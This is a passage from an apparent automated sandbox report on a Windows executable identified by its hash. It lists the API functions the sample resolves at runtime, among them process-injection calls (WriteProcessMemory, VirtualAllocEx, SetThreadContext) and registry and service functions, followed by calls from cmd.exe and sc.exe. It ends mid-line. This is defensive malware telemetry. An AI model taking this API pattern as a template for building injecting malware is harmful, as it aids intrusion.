\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005548)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005904)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00005904)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005904)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00005904)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005904)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001588)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001588)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004644)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004644)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a 